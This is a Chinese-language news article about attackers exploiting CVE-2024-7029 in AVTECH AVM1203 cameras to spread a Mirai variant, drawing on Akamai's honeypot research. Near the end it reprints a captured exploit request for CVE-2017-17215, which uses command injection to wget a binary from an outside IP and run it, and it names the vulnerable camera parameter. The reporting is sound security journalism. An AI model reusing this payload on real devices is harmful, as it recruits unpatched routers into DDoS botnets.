恶意黑客正在利用一个广泛使用的安全摄像头中的关键漏洞来传播Mirai,这是一种将受感染的物联网设备组成大型网络的恶意软件家族,用于发动攻击,导致网站和其他联网设备瘫痪。
据网络安全提供商Akamai周三表示,这些攻击的目标是来自台湾制造商AVTECH的监控设备AVM1203
。自3月以来,不明攻击者一直在利用这一存在5年的漏洞。这一零日漏洞被追踪为CVE-2024-7029,易于利用,允许攻击者执行恶意代码。AVM1203已经不再销售或提供支持,因此没有可用的更新来修复这一关键零日漏洞。
一次杂牌军队震撼互联网的时刻
Akamai表示,攻击者正在利用这一漏洞安装一种Mirai变种,Mirai于2016年9月首次出现,当时一个受感染设备的僵尸网络攻击了网络安全新闻网站Krebs on Security。Mirai具有功能,可以让一支杂牌军队由被攻陷的网络摄像头、路由器和其他类型的物联网设备组成,发动分布式拒绝服务(DDoS)攻击,达到创纪录的规模。
接下来的几周里,Mirai僵尸网络对互联网服务提供商和其他目标发起了类似的攻击。其中一次针对动态域名提供商Dyn的攻击瘫痪了互联网的大片区域。由于Mirai的创建者将恶意软件公开发布,几乎任何人都可以创建自己的僵尸网络,发动曾经难以想象的规模的DDoS攻击,这使得遏制Mirai的尝试变得更加复杂。
Akamai的安全情报与响应团队的安全研究员Kyle Lefton在一封电子邮件中表示,他们观察到攻击背后的威胁行为者对“各种组织”执行了DDoS攻击,但他没有进一步命名或描述这些组织。
目前,该团队尚未看到威胁行为者监控视频源或将受感染的摄像头用于其他目的的迹象。Akamai使用一种“蜜罐”技术检测到了这些活动,该技术在开放的互联网上模拟这些摄像头,以观察针对它们的攻击。这种技术并不允许研究人员测量僵尸网络的规模。美国网络安全和基础设施安全局(CISA)在本月早些时候警告了这一漏洞。然而,这种技术允许Akamai捕获用于攻陷设备的代码。
该漏洞自2019年以来就已为人所知,当时利用代码公开。零日漏洞存在于“action=”参数的“亮度参数”中,允许进行命令注入,研究人员写道。该零日漏洞由Akamai研究员Aline Eliovich发现,直到本月发布CVE-2024-7029时才正式承认。
周三的帖子继续说明:
它如何工作?
最初是在检查我们的蜜罐日志时发现了这个漏洞。
图1显示了为了清晰起见的解码URL。解码的有效载荷图1:利用尝试的有效载荷体的解码漏洞存在于文件/cgi-bin/supervisor/Factory.cgi中的亮度功能中(图2)。可能发生什么?在我们观察到的利用示例中,基本上发生的是:利用这一漏洞可以让攻击者在目标系统上执行远程代码。图3显示了威胁行为者利用这个漏洞下载并运行一个JavaScript文件以获取并加载他们的主要恶意软件有效载荷的一个例子。
类似于许多其他僵尸网络,这个僵尸网络也在其目标中传播一种Mirai恶意软件的变种。在这种情况下,僵尸网络可能使用了Corona Mirai变种,其他供应商在2020年早些时候曾提到与COVID-19病毒有关。执行后,恶意软件通过Telnet连接到大量主机,使用端口23、2323和37215。它还会在受感染的主机控制台上打印字符串“Corona”(图4)。对恶意软件样本中的字符串进行静态分析显示,目标路径为/ctrlt/DeviceUpgrade_1,企图利用受CVE-2017-17215影响的华为设备。这些样本有两个硬编码的命令和控制IP地址,其中一个是CVE-2017-17215漏洞代码的一部分:POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"$(/bin/busybox wget -g 45.14.244[.]89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 * /tmp/mips; /tmp/mips huawei.rep)$(echo HUAWEIUPNP)
该僵尸网络还利用了其他几个漏洞,包括Hadoop YARN RCE、CVE-2014-8361和CVE-2017-17215。
我们多次观察到这些漏洞被实际利用,并且它们仍然成功。由于该摄像头型号不再受支持,任何使用该设备的人最好的做法是更换它。
与所有联网设备一样,物联网设备绝不应使用出厂时附带的默认凭据进行访问。